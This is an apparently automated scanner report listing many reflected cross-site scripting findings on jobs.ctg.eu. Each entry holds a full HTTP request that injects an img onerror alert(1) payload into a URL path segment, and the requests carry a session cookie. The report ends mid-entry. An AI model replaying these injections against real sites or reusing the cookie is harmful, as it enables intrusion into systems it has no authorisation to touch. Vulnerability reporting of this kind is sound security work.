GET /sites73224"><img%20src%3da%20onerror%3dalert(1)>9589d103583/all/modules/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ad"><img%20src%3da%20onerror%3dalert(1)>2a3d032736e was submitted in the REST URL parameter 2. This input was echoed as 544ad"><img src=a onerror=alert(1)>2a3d032736e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all544ad"><img%20src%3da%20onerror%3dalert(1)>2a3d032736e/modules/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790cb"><img%20src%3da%20onerror%3dalert(1)>671c6b10ccd was submitted in the REST URL parameter 3. This input was echoed as 790cb"><img src=a onerror=alert(1)>671c6b10ccd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules790cb"><img%20src%3da%20onerror%3dalert(1)>671c6b10ccd/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12225"><img%20src%3da%20onerror%3dalert(1)>e7c4abc7d00 was submitted in the REST URL parameter 4. This input was echoed as 12225"><img src=a onerror=alert(1)>e7c4abc7d00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/logintoboggan12225"><img%20src%3da%20onerror%3dalert(1)>e7c4abc7d00/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302e5"><img%20src%3da%20onerror%3dalert(1)>7ed5455b6be was submitted in the REST URL parameter 5. This input was echoed as 302e5"><img src=a onerror=alert(1)>7ed5455b6be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/logintoboggan/logintoboggan.css302e5"><img%20src%3da%20onerror%3dalert(1)>7ed5455b6be?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f3d1"><img%20src%3da%20onerror%3dalert(1)>eea6370678e was submitted in the REST URL parameter 1. This input was echoed as 9f3d1"><img src=a onerror=alert(1)>eea6370678e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites9f3d1"><img%20src%3da%20onerror%3dalert(1)>eea6370678e/all/modules/views/css/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e296a"><img%20src%3da%20onerror%3dalert(1)>55f421ac453 was submitted in the REST URL parameter 2. This input was echoed as e296a"><img src=a onerror=alert(1)>55f421ac453 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/alle296a"><img%20src%3da%20onerror%3dalert(1)>55f421ac453/modules/views/css/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f68"><img%20src%3da%20onerror%3dalert(1)>5a9f31570fe was submitted in the REST URL parameter 3. This input was echoed as d4f68"><img src=a onerror=alert(1)>5a9f31570fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesd4f68"><img%20src%3da%20onerror%3dalert(1)>5a9f31570fe/views/css/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38029"><img%20src%3da%20onerror%3dalert(1)>d2997aa32cd was submitted in the REST URL parameter 4. This input was echoed as 38029"><img src=a onerror=alert(1)>d2997aa32cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views38029"><img%20src%3da%20onerror%3dalert(1)>d2997aa32cd/css/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a641b"><img%20src%3da%20onerror%3dalert(1)>bebe5c861b9 was submitted in the REST URL parameter 5. This input was echoed as a641b"><img src=a onerror=alert(1)>bebe5c861b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/cssa641b"><img%20src%3da%20onerror%3dalert(1)>bebe5c861b9/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce"><img%20src%3da%20onerror%3dalert(1)>e2f23c29595 was submitted in the REST URL parameter 6. This input was echoed as 217ce"><img src=a onerror=alert(1)>e2f23c29595 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/css/views.css217ce"><img%20src%3da%20onerror%3dalert(1)>e2f23c29595?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ce2"><img%20src%3da%20onerror%3dalert(1)>b6a4460d151 was submitted in the REST URL parameter 1. This input was echoed as 55ce2"><img src=a onerror=alert(1)>b6a4460d151 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites55ce2"><img%20src%3da%20onerror%3dalert(1)>b6a4460d151/all/modules/views/js/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1472"><img%20src%3da%20onerror%3dalert(1)>f600b8d8b7f was submitted in the REST URL parameter 2. This input was echoed as b1472"><img src=a onerror=alert(1)>f600b8d8b7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allb1472"><img%20src%3da%20onerror%3dalert(1)>f600b8d8b7f/modules/views/js/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db72e"><img%20src%3da%20onerror%3dalert(1)>21d9a5a41d6 was submitted in the REST URL parameter 3. This input was echoed as db72e"><img src=a onerror=alert(1)>21d9a5a41d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesdb72e"><img%20src%3da%20onerror%3dalert(1)>21d9a5a41d6/views/js/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40667"><img%20src%3da%20onerror%3dalert(1)>7444b52466 was submitted in the REST URL parameter 4. This input was echoed as 40667"><img src=a onerror=alert(1)>7444b52466 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views40667"><img%20src%3da%20onerror%3dalert(1)>7444b52466/js/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98959"><img%20src%3da%20onerror%3dalert(1)>38f529bd14c was submitted in the REST URL parameter 5. This input was echoed as 98959"><img src=a onerror=alert(1)>38f529bd14c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/js98959"><img%20src%3da%20onerror%3dalert(1)>38f529bd14c/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d277"><img%20src%3da%20onerror%3dalert(1)>086dd8d227a was submitted in the REST URL parameter 6. This input was echoed as 5d277"><img src=a onerror=alert(1)>086dd8d227a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/js/base.js5d277"><img%20src%3da%20onerror%3dalert(1)>086dd8d227a?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a17d3"><img%20src%3da%20onerror%3dalert(1)>d553028ad8d was submitted in the REST URL parameter 1. This input was echoed as a17d3"><img src=a onerror=alert(1)>d553028ad8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesa17d3"><img%20src%3da%20onerror%3dalert(1)>d553028ad8d/all/modules/views/js/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d6d"><img%20src%3da%20onerror%3dalert(1)>f58295307b1 was submitted in the REST URL parameter 2. This input was echoed as e3d6d"><img src=a onerror=alert(1)>f58295307b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/alle3d6d"><img%20src%3da%20onerror%3dalert(1)>f58295307b1/modules/views/js/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab624"><img%20src%3da%20onerror%3dalert(1)>3f8d84be38 was submitted in the REST URL parameter 3. This input was echoed as ab624"><img src=a onerror=alert(1)>3f8d84be38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesab624"><img%20src%3da%20onerror%3dalert(1)>3f8d84be38/views/js/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42122"><img%20src%3da%20onerror%3dalert(1)>5997e6b530 was submitted in the REST URL parameter 4. This input was echoed as 42122"><img src=a onerror=alert(1)>5997e6b530 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views42122"><img%20src%3da%20onerror%3dalert(1)>5997e6b530/js/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b518a"><img%20src%3da%20onerror%3dalert(1)>ec316c3a283 was submitted in the REST URL parameter 5. This input was echoed as b518a"><img src=a onerror=alert(1)>ec316c3a283 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/jsb518a"><img%20src%3da%20onerror%3dalert(1)>ec316c3a283/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db2bb"><img%20src%3da%20onerror%3dalert(1)>d9d6098e8ef was submitted in the REST URL parameter 6. This input was echoed as db2bb"><img src=a onerror=alert(1)>d9d6098e8ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/js/dependent.jsdb2bb"><img%20src%3da%20onerror%3dalert(1)>d9d6098e8ef?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72838"><img%20src%3da%20onerror%3dalert(1)>b3d0a8fde2f was submitted in the REST URL parameter 1. This input was echoed as 72838"><img src=a onerror=alert(1)>b3d0a8fde2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites72838"><img%20src%3da%20onerror%3dalert(1)>b3d0a8fde2f/all/modules/views_accordion/views-accordion.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d572"><img%20src%3da%20onerror%3dalert(1)>4fdbbcc7f36 was submitted in the REST URL parameter 2. This input was echoed as 1d572"><img src=a onerror=alert(1)>4fdbbcc7f36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
